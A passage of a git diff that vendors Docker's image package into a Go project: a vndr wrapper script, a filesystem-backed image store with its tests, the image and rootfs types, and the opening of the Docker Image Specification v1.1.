+#!/bin/bash + +# This file is just wrapper around vndr (github.com/LK4D4/vndr) tool. +# For updating dependencies you should change `vendor.conf` file in root of the +# project. Please refer to https://github.com/LK4D4/vndr/blob/master/README.md for +# vndr usage. + +set -e + +if ! 
hash vndr; then + echo "Please install vndr with \"go get github.com/LK4D4/vndr\" and put it in your \$GOPATH" + exit 1 +fi + +vndr "$@" diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go new file mode 100644 index 0000000000..39cfbf5d74 --- /dev/null +++ b/vendor/github.com/docker/docker/image/fs.go @@ -0,0 +1,173 @@ +package image + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/ioutils" +) + +// DigestWalkFunc is function called by StoreBackend.Walk +type DigestWalkFunc func(id digest.Digest) error + +// StoreBackend provides interface for image.Store persistence +type StoreBackend interface { + Walk(f DigestWalkFunc) error + Get(id digest.Digest) ([]byte, error) + Set(data []byte) (digest.Digest, error) + Delete(id digest.Digest) error + SetMetadata(id digest.Digest, key string, data []byte) error + GetMetadata(id digest.Digest, key string) ([]byte, error) + DeleteMetadata(id digest.Digest, key string) error +} + +// fs implements StoreBackend using the filesystem. 
+type fs struct { + sync.RWMutex + root string +} + +const ( + contentDirName = "content" + metadataDirName = "metadata" +) + +// NewFSStoreBackend returns new filesystem based backend for image.Store +func NewFSStoreBackend(root string) (StoreBackend, error) { + return newFSStore(root) +} + +func newFSStore(root string) (*fs, error) { + s := &fs{ + root: root, + } + if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil { + return nil, err + } + if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil { + return nil, err + } + return s, nil +} + +func (s *fs) contentFile(dgst digest.Digest) string { + return filepath.Join(s.root, contentDirName, string(dgst.Algorithm()), dgst.Hex()) +} + +func (s *fs) metadataDir(dgst digest.Digest) string { + return filepath.Join(s.root, metadataDirName, string(dgst.Algorithm()), dgst.Hex()) +} + +// Walk calls the supplied callback for each image ID in the storage backend. +func (s *fs) Walk(f DigestWalkFunc) error { + // Only Canonical digest (sha256) is currently supported + s.RLock() + dir, err := ioutil.ReadDir(filepath.Join(s.root, contentDirName, string(digest.Canonical))) + s.RUnlock() + if err != nil { + return err + } + for _, v := range dir { + dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name()) + if err := dgst.Validate(); err != nil { + logrus.Debugf("Skipping invalid digest %s: %s", dgst, err) + continue + } + if err := f(dgst); err != nil { + return err + } + } + return nil +} + +// Get returns the content stored under a given digest. 
+func (s *fs) Get(dgst digest.Digest) ([]byte, error) { + s.RLock() + defer s.RUnlock() + + return s.get(dgst) +} + +func (s *fs) get(dgst digest.Digest) ([]byte, error) { + content, err := ioutil.ReadFile(s.contentFile(dgst)) + if err != nil { + return nil, err + } + + // todo: maybe optional + if digest.FromBytes(content) != dgst { + return nil, fmt.Errorf("failed to verify: %v", dgst) + } + + return content, nil +} + +// Set stores content by checksum. +func (s *fs) Set(data []byte) (digest.Digest, error) { + s.Lock() + defer s.Unlock() + + if len(data) == 0 { + return "", fmt.Errorf("Invalid empty data") + } + + dgst := digest.FromBytes(data) + if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil { + return "", err + } + + return dgst, nil +} + +// Delete removes content and metadata files associated with the digest. +func (s *fs) Delete(dgst digest.Digest) error { + s.Lock() + defer s.Unlock() + + if err := os.RemoveAll(s.metadataDir(dgst)); err != nil { + return err + } + if err := os.Remove(s.contentFile(dgst)); err != nil { + return err + } + return nil +} + +// SetMetadata sets metadata for a given ID. It fails if there's no base file. +func (s *fs) SetMetadata(dgst digest.Digest, key string, data []byte) error { + s.Lock() + defer s.Unlock() + if _, err := s.get(dgst); err != nil { + return err + } + + baseDir := filepath.Join(s.metadataDir(dgst)) + if err := os.MkdirAll(baseDir, 0700); err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(s.metadataDir(dgst), key), data, 0600) +} + +// GetMetadata returns metadata for a given digest. +func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) { + s.RLock() + defer s.RUnlock() + + if _, err := s.get(dgst); err != nil { + return nil, err + } + return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) +} + +// DeleteMetadata removes the metadata associated with a digest. 
+func (s *fs) DeleteMetadata(dgst digest.Digest, key string) error { + s.Lock() + defer s.Unlock() + + return os.RemoveAll(filepath.Join(s.metadataDir(dgst), key)) +} diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go new file mode 100644 index 0000000000..8d602d97eb --- /dev/null +++ b/vendor/github.com/docker/docker/image/fs_test.go @@ -0,0 +1,384 @@ +package image + +import ( + "bytes" + "crypto/rand" + "crypto/sha256" + "encoding/hex" + "errors" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/distribution/digest" +) + +func TestFSGetSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testGetSet(t, fs) +} + +func TestFSGetInvalidData(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id, err := fs.Set([]byte("foobar")) + if err != nil { + t.Fatal(err) + } + + dgst := digest.Digest(id) + + if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil { + t.Fatal(err) + } + + _, err = fs.Get(id) + if err == nil { + t.Fatal("Expected get to fail after data modification.") + } +} + +func TestFSInvalidSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + id := digest.FromBytes([]byte("foobar")) + err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700) + if err != nil { + t.Fatal(err) + } + + _, err = fs.Set([]byte("foobar")) + if err == nil { + t.Fatal("Expecting error from 
invalid filesystem data.") + } +} + +func TestFSInvalidRoot(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + tcases := []struct { + root, invalidFile string + }{ + {"root", "root"}, + {"root", "root/content"}, + {"root", "root/metadata"}, + } + + for _, tc := range tcases { + root := filepath.Join(tmpdir, tc.root) + filePath := filepath.Join(tmpdir, tc.invalidFile) + err := os.MkdirAll(filepath.Dir(filePath), 0700) + if err != nil { + t.Fatal(err) + } + f, err := os.Create(filePath) + if err != nil { + t.Fatal(err) + } + f.Close() + + _, err = NewFSStoreBackend(root) + if err == nil { + t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile) + } + + os.RemoveAll(root) + } + +} + +func testMetadataGetSet(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + tcases := []struct { + id digest.Digest + key string + value []byte + }{ + {id, "tkey", []byte("tval1")}, + {id, "tkey2", []byte("tval2")}, + {id2, "tkey", []byte("tval3")}, + } + + for _, tc := range tcases { + err = store.SetMetadata(tc.id, tc.key, tc.value) + if err != nil { + t.Fatal(err) + } + + actual, err := store.GetMetadata(tc.id, tc.key) + if err != nil { + t.Fatal(err) + } + if bytes.Compare(actual, tc.value) != 0 { + t.Fatalf("Metadata expected %q, got %q", tc.value, actual) + } + } + + _, err = store.GetMetadata(id2, "tkey2") + if err == nil { + t.Fatal("Expected error for getting metadata for unknown key") + } + + id3 := digest.FromBytes([]byte("baz")) + err = store.SetMetadata(id3, "tkey", []byte("tval")) + if err == nil { + t.Fatal("Expected error for setting metadata for unknown ID.") + } + + _, err = store.GetMetadata(id3, "tkey") + if err == nil { + t.Fatal("Expected error for getting metadata for unknown ID.") + } +} + +func 
TestFSMetadataGetSet(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testMetadataGetSet(t, fs) +} + +func TestFSDelete(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testDelete(t, fs) +} + +func TestFSWalker(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + testWalker(t, fs) +} + +func TestFSInvalidWalker(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "images-fs-store") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + fs, err := NewFSStoreBackend(tmpdir) + if err != nil { + t.Fatal(err) + } + + fooID, err := fs.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil { + t.Fatal(err) + } + + n := 0 + err = fs.Walk(func(id digest.Digest) error { + if id != fooID { + t.Fatalf("Invalid walker ID %q, expected %q", id, fooID) + } + n++ + return nil + }) + if err != nil { + t.Fatalf("Invalid data should not have caused walker error, got %v", err) + } + if n != 1 { + t.Fatalf("Expected 1 walk initialization, got %d", n) + } +} + +func testGetSet(t *testing.T, store StoreBackend) { + type tcase struct { + input []byte + expected digest.Digest + } + tcases := []tcase{ + {[]byte("foobar"), digest.Digest("sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2")}, + } + + randomInput := make([]byte, 8*1024) + _, err := rand.Read(randomInput) + if err != nil { + t.Fatal(err) + } + // skipping use of digest pkg because its 
used by the implementation + h := sha256.New() + _, err = h.Write(randomInput) + if err != nil { + t.Fatal(err) + } + tcases = append(tcases, tcase{ + input: randomInput, + expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))), + }) + + for _, tc := range tcases { + id, err := store.Set([]byte(tc.input)) + if err != nil { + t.Fatal(err) + } + if id != tc.expected { + t.Fatalf("Expected ID %q, got %q", tc.expected, id) + } + } + + for _, emptyData := range [][]byte{nil, {}} { + _, err := store.Set(emptyData) + if err == nil { + t.Fatal("Expected error for nil input.") + } + } + + for _, tc := range tcases { + data, err := store.Get(tc.expected) + if err != nil { + t.Fatal(err) + } + if bytes.Compare(data, tc.input) != 0 { + t.Fatalf("Expected data %q, got %q", tc.input, data) + } + } + + for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} { + _, err := store.Get(key) + if err == nil { + t.Fatalf("Expected error for ID %q.", key) + } + } + +} + +func testDelete(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + err = store.Delete(id) + if err != nil { + t.Fatal(err) + } + + _, err = store.Get(id) + if err == nil { + t.Fatalf("Expected getting deleted item %q to fail", id) + } + _, err = store.Get(id2) + if err != nil { + t.Fatal(err) + } + + err = store.Delete(id2) + if err != nil { + t.Fatal(err) + } + _, err = store.Get(id2) + if err == nil { + t.Fatalf("Expected getting deleted item %q to fail", id2) + } +} + +func testWalker(t *testing.T, store StoreBackend) { + id, err := store.Set([]byte("foo")) + if err != nil { + t.Fatal(err) + } + id2, err := store.Set([]byte("bar")) + if err != nil { + t.Fatal(err) + } + + tcases := make(map[digest.Digest]struct{}) + tcases[id] = struct{}{} + tcases[id2] = struct{}{} + n := 0 + err = 
store.Walk(func(id digest.Digest) error { + delete(tcases, id) + n++ + return nil + }) + if err != nil { + t.Fatal(err) + } + + if n != 2 { + t.Fatalf("Expected 2 walk initializations, got %d", n) + } + if len(tcases) != 0 { + t.Fatalf("Expected empty unwalked set, got %+v", tcases) + } + + // stop on error + tcases = make(map[digest.Digest]struct{}) + tcases[id] = struct{}{} + err = store.Walk(func(id digest.Digest) error { + return errors.New("") + }) + if err == nil { + t.Fatalf("Exected error from walker.") + } +} diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go new file mode 100644 index 0000000000..29a990a556 --- /dev/null +++ b/vendor/github.com/docker/docker/image/image.go @@ -0,0 +1,150 @@ +package image + +import ( + "encoding/json" + "errors" + "io" + "time" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types/container" +) + +// ID is the content-addressable ID of an image. +type ID digest.Digest + +func (id ID) String() string { + return id.Digest().String() +} + +// Digest converts ID into a digest +func (id ID) Digest() digest.Digest { + return digest.Digest(id) +} + +// IDFromDigest creates an ID from a digest +func IDFromDigest(digest digest.Digest) ID { + return ID(digest) +} + +// V1Image stores the V1 image configuration. 
+type V1Image struct { + // ID a unique 64 character identifier of the image + ID string `json:"id,omitempty"` + // Parent id of the image + Parent string `json:"parent,omitempty"` + // Comment user added comment + Comment string `json:"comment,omitempty"` + // Created timestamp when image was created + Created time.Time `json:"created"` + // Container is the id of the container used to commit + Container string `json:"container,omitempty"` + // ContainerConfig is the configuration of the container that is committed into the image + ContainerConfig container.Config `json:"container_config,omitempty"` + // DockerVersion specifies version on which image is built + DockerVersion string `json:"docker_version,omitempty"` + // Author of the image + Author string `json:"author,omitempty"` + // Config is the configuration of the container received from the client + Config *container.Config `json:"config,omitempty"` + // Architecture is the hardware that the image is build and runs on + Architecture string `json:"architecture,omitempty"` + // OS is the operating system used to build and run the image + OS string `json:"os,omitempty"` + // Size is the total size of the image including all layers it is composed of + Size int64 `json:",omitempty"` +} + +// Image stores the image configuration +type Image struct { + V1Image + Parent ID `json:"parent,omitempty"` + RootFS *RootFS `json:"rootfs,omitempty"` + History []History `json:"history,omitempty"` + OSVersion string `json:"os.version,omitempty"` + OSFeatures []string `json:"os.features,omitempty"` + + // rawJSON caches the immutable JSON associated with this image. + rawJSON []byte + + // computedID is the ID computed from the hash of the image config. + // Not to be confused with the legacy V1 ID in V1Image. + computedID ID +} + +// RawJSON returns the immutable JSON associated with the image. +func (img *Image) RawJSON() []byte { + return img.rawJSON +} + +// ID returns the image's content-addressable ID. 
+func (img *Image) ID() ID { + return img.computedID +} + +// ImageID stringifies ID. +func (img *Image) ImageID() string { + return img.ID().String() +} + +// RunConfig returns the image's container config. +func (img *Image) RunConfig() *container.Config { + return img.Config +} + +// MarshalJSON serializes the image to JSON. It sorts the top-level keys so +// that JSON that's been manipulated by a push/pull cycle with a legacy +// registry won't end up with a different key order. +func (img *Image) MarshalJSON() ([]byte, error) { + type MarshalImage Image + + pass1, err := json.Marshal(MarshalImage(*img)) + if err != nil { + return nil, err + } + + var c map[string]*json.RawMessage + if err := json.Unmarshal(pass1, &c); err != nil { + return nil, err + } + return json.Marshal(c) +} + +// History stores build commands that were used to create an image +type History struct { + // Created timestamp for build point + Created time.Time `json:"created"` + // Author of the build point + Author string `json:"author,omitempty"` + // CreatedBy keeps the Dockerfile command used while building image. + CreatedBy string `json:"created_by,omitempty"` + // Comment is custom message set by the user when creating the image. + Comment string `json:"comment,omitempty"` + // EmptyLayer is set to true if this history item did not generate a + // layer. Otherwise, the history item is associated with the next + // layer in the RootFS section. + EmptyLayer bool `json:"empty_layer,omitempty"` +} + +// Exporter provides interface for exporting and importing images +type Exporter interface { + Load(io.ReadCloser, io.Writer, bool) error + // TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error + Save([]string, io.Writer) error +} + +// NewFromJSON creates an Image configuration from json. 
+func NewFromJSON(src []byte) (*Image, error) { + img := &Image{} + + if err := json.Unmarshal(src, img); err != nil { + return nil, err + } + if img.RootFS == nil { + return nil, errors.New("Invalid image JSON, no RootFS key.") + } + + img.rawJSON = src + + return img, nil +} diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go new file mode 100644 index 0000000000..525023b813 --- /dev/null +++ b/vendor/github.com/docker/docker/image/image_test.go @@ -0,0 +1,59 @@ +package image + +import ( + "encoding/json" + "sort" + "strings" + "testing" +) + +const sampleImageJSON = `{ + "architecture": "amd64", + "os": "linux", + "config": {}, + "rootfs": { + "type": "layers", + "diff_ids": [] + } +}` + +func TestJSON(t *testing.T) { + img, err := NewFromJSON([]byte(sampleImageJSON)) + if err != nil { + t.Fatal(err) + } + rawJSON := img.RawJSON() + if string(rawJSON) != sampleImageJSON { + t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", sampleImageJSON, rawJSON) + } +} + +func TestInvalidJSON(t *testing.T) { + _, err := NewFromJSON([]byte("{}")) + if err == nil { + t.Fatal("Expected JSON parse error") + } +} + +func TestMarshalKeyOrder(t *testing.T) { + b, err := json.Marshal(&Image{ + V1Image: V1Image{ + Comment: "a", + Author: "b", + Architecture: "c", + }, + }) + if err != nil { + t.Fatal(err) + } + + expectedOrder := []string{"architecture", "author", "comment"} + var indexes []int + for _, k := range expectedOrder { + indexes = append(indexes, strings.Index(string(b), k)) + } + + if !sort.IntsAreSorted(indexes) { + t.Fatal("invalid key order in JSON: ", string(b)) + } +} diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go new file mode 100644 index 0000000000..7b24e3ed1e --- /dev/null +++ b/vendor/github.com/docker/docker/image/rootfs.go @@ -0,0 +1,44 @@ +package image + +import ( + "runtime" + + "github.com/Sirupsen/logrus" + 
"github.com/docker/docker/layer" +) + +// TypeLayers is used for RootFS.Type for filesystems organized into layers. +const TypeLayers = "layers" + +// typeLayersWithBase is an older format used by Windows up to v1.12. We +// explicitly handle this as an error case to ensure that a daemon which still +// has an older image like this on disk can still start, even though the +// image itself is not usable. See https://github.com/docker/docker/pull/25806. +const typeLayersWithBase = "layers+base" + +// RootFS describes images root filesystem +// This is currently a placeholder that only supports layers. In the future +// this can be made into an interface that supports different implementations. +type RootFS struct { + Type string `json:"type"` + DiffIDs []layer.DiffID `json:"diff_ids,omitempty"` +} + +// NewRootFS returns empty RootFS struct +func NewRootFS() *RootFS { + return &RootFS{Type: TypeLayers} +} + +// Append appends a new diffID to rootfs +func (r *RootFS) Append(id layer.DiffID) { + r.DiffIDs = append(r.DiffIDs, id) +} + +// ChainID returns the ChainID for the top layer in RootFS. +func (r *RootFS) ChainID() layer.ChainID { + if runtime.GOOS == "windows" && r.Type == typeLayersWithBase { + logrus.Warnf("Layer type is unsupported on this platform. DiffIDs: '%v'", r.DiffIDs) + return "" + } + return layer.CreateChainID(r.DiffIDs) +} diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md new file mode 100644 index 0000000000..83f138011d --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.1.md @@ -0,0 +1,637 @@ +# Docker Image Specification v1.1.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. 
+ +This version of the image specification was adopted starting in Docker 1.10. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Each layer is a set of filesystem + changes. Layers do not have configuration metadata such as environment + variables or default arguments - these are properties of the image as a + whole rather than any particular layer. +
+
+ Image JSON +
+
+ Each image has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. The JSON structure also references a cryptographic hash of + each layer used by the image, and provides history information for + those layers. This JSON is considered to be immutable, because changing + it would change the computed ImageID. Changing it means creating a new + derived image, instead of changing the existing image. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Layer DiffID +
+
+ Layers are referenced by cryptographic hashes of their serialized + representation. This is a SHA256 digest over the tar archive used to + transport the layer, represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Layers must be packed and unpacked reproducibly to avoid changing the + layer ID, for example by using tar-split to save the tar headers. Note + that the digest used as the layer ID is taken over an uncompressed + version of the tar. +
+
+ Layer ChainID +
+
+ For convenience, it is sometimes useful to refer to a stack of layers + with a single identifier. This is called a ChainID. For a + single layer (or the layer at the bottom of a stack), the + ChainID is equal to the layer's DiffID. + Otherwise the ChainID is given by the formula: + ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN)). +
+
+ ImageID +
+
+ Each image's ID is given by the SHA256 hash of its configuration JSON. It is + represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Since the configuration JSON that gets hashed references hashes of each + layer in the image, this formulation of the ImageID makes images + content-addressable. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. Tag values are limited to the set of characters + [a-zA-Z0-9_.-], except they may not start with a . + or - character. Tags are limited to 127 characters. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. A repository name is made up of slash-separated + name components, optionally prefixed by a DNS hostname. The hostname + must follow comply with standard DNS rules, but may not contain + _ characters. If a hostname is present, it may optionally + be followed by a port number in the format :8080. + Name components may contain lowercase characters, digits, and + separators. A separator is defined as a period, one or two underscores, + or one or more dashes. A name component may not start or end with + a separator. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "created": "2015-10-31T22:22:56.015925234Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + }, + "rootfs": { + "diff_ids": [ + "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ], + "type": "layers" + }, + "history": [ + { + "created": "2015-10-31T22:22:54.690851953Z", + "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /" + }, + { + "created": "2015-10-31T22:22:55.613815829Z", + "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]", + "empty_layer": true + } + ] +} +``` + +Note that image JSON files produced by Docker don't contain formatting +whitespace. It has been added to this example for clarity. + +### Image JSON Field Descriptions + +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {}
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ rootfs struct +
+
+ The rootfs key references the layer content addresses used by the + image. This makes the image config hash depend on the filesystem hash. + rootfs has two subkeys: + +
    +
  • + type is usually set to layers. +
  • +
  • + diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most. +
  • +
+ + + Here is an example rootfs section: + +
"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}
+
+
+ history struct +
+
+ history is an array of objects describing the history of + each layer. The array is ordered from bottom-most layer to top-most + layer. The object has the following fields. + +
    +
  • + created: Creation time, expressed as an ISO-8601 formatted + combined date and time +
  • +
  • + author: The author of the build point +
  • +
  • + created_by: The command which created the layer +
  • +
  • + comment: A custom message set when creating the layer +
  • +
  • + empty_layer: This field is used to mark if the history + item created a filesystem diff. It is set to true if this history + item doesn't correspond to an actual layer in the rootfs section + (for example, a command like ENV which results in no change to the + filesystem). +
  • +
+ +Here is an example history section: + +
"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory. Here is the +initial empty directory structure for the a changeset using the +randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are +generated based on the content](#id_desc)). + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +To make changes to the filesystem of this container image, create a new +directory, such as `f60c56784b83`, and initialize it with a snapshot of the +parent image's root filesystem, so that the directory is identical to that +of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very +efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. The `f60c56784b83` +directory then looks like this: + +``` +f60c56784b83/ + etc/ + my-app.d/ + default.cfg + bin/ + my-app-binary + my-app-tools +``` + +This reflects the removal of `/etc/my-app-config` and creation of a file and +directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been +replaced with an updated version. 
